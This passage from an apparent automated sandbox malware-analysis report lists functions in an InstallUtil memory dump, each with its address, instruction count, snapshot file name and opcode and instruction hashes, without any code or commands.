                                                  • Instruction Fuzzy Hash: 4E116978D0420ADFCF41DFA8D8409AEBBB0FF49300F1080A6D910A3394D7346A16DFA1
                                                  Function 0105ABE0 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b8e17b3d114b5ec78f498f08123407c745d9f56b24959a3bbef6f970c58bfbcb
                                                  • Instruction ID: 1e3a98eda5c4e2d46dd3feb259c7455076c3b10960b3537bc9a5d4354b2ff3c2
                                                  • Opcode Fuzzy Hash: b8e17b3d114b5ec78f498f08123407c745d9f56b24959a3bbef6f970c58bfbcb
                                                  • Instruction Fuzzy Hash: 3DF0FC31300614CF97A55A2EA85462F7EDEEFC895530545BAED85C7362EE21CC038380
                                                  Function 01059C29 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1d3196dd78559775221ab763b891e4b6d559364ce3b84a4d970b2594cc6a6e8
                                                  • Instruction ID: b17450d37e35049e382ddad79d4d9f7c7d081fa3a511caf7a732e06df7f38701
                                                  • Opcode Fuzzy Hash: a1d3196dd78559775221ab763b891e4b6d559364ce3b84a4d970b2594cc6a6e8
                                                  • Instruction Fuzzy Hash: D2F08C76A00118EFDF90DF69D808AEEBBF5EFC9325F10C06AE948C7214D7314A158BA0
                                                  Function 01056739 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1f5951fcb64965870227bd1bdd8b9a4bf0428e58e8ba9967ef865ea86cfb58e
                                                  • Instruction ID: 4fa8ae86bcadb8cbef263cd2ee2c3e3d15b3f56c82f47baa0b3dd6d6c0c428ba
                                                  • Opcode Fuzzy Hash: e1f5951fcb64965870227bd1bdd8b9a4bf0428e58e8ba9967ef865ea86cfb58e
                                                  • Instruction Fuzzy Hash: 23E08C3000D3C60EC70BA778A8244693F2E9D8320472885E6D1854E17FDE69180AE361
                                                  Function 010528B0 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b07ed24ed3b6b7f26afc2d758c8002f6b7afeca17dcce6685e00d9b00bda0b05
                                                  • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                  • Opcode Fuzzy Hash: b07ed24ed3b6b7f26afc2d758c8002f6b7afeca17dcce6685e00d9b00bda0b05
                                                  • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                  Function 010528AB Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4d57f885d39e955c01843ad80d99612341787545188435301c5fd27488b4050
                                                  • Instruction ID: ff7d5e543f9cf357aeec39d36012ff73ca1dddb7f8a364efc1b2f37a1ab7e88c
                                                  • Opcode Fuzzy Hash: f4d57f885d39e955c01843ad80d99612341787545188435301c5fd27488b4050
                                                  • Instruction Fuzzy Hash: 83D0C231D20226C2CB10EBA0AC000DEB334EE90221B548626C42836140EB30265986D2
                                                  Function 0105D6D4 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2526fc6b55fdb6de2aab810c869b21b367efe897e735e4d461d6a08811ffc01f
                                                  • Instruction ID: a4813c787fd08356e2187c03f9d6bf3597f9f4a097da3192ef12a5f0c882d861
                                                  • Opcode Fuzzy Hash: 2526fc6b55fdb6de2aab810c869b21b367efe897e735e4d461d6a08811ffc01f
                                                  • Instruction Fuzzy Hash: 0DD0E234E04009CBCB30DFA8E4848DCBB70EF58321B10542BD965A3616C6341811CF10
                                                  Function 0105AFAD Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b843077b93df1cc8e850451356b37a9ab6a35b81160e54c6a9564cc7cc84f93f
                                                  • Instruction ID: 082b97a6285fb69673d9de6424908e0efbd1bd48d7b026126a912d94251baae9
                                                  • Opcode Fuzzy Hash: b843077b93df1cc8e850451356b37a9ab6a35b81160e54c6a9564cc7cc84f93f
                                                  • Instruction Fuzzy Hash: 0AD0673AB40018AFCB149F98E8408DDFB76FB98221B048116E915A3265C6319925DB50
                                                  Function 01056748 Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f3a9e76ea2bfb32a8a1bdcf61052ec0b26137594985e51474131e52b3c2e1e4d
                                                  • Instruction ID: 459c6b4422fc734a092f7bad20e7c5283900bdae40d5d87968c0bb2755479288
                                                  • Opcode Fuzzy Hash: f3a9e76ea2bfb32a8a1bdcf61052ec0b26137594985e51474131e52b3c2e1e4d
                                                  • Instruction Fuzzy Hash: 3EC012300443094ED54DFB65FD459197B5EEA802047508530A2060A67DEF78594A8790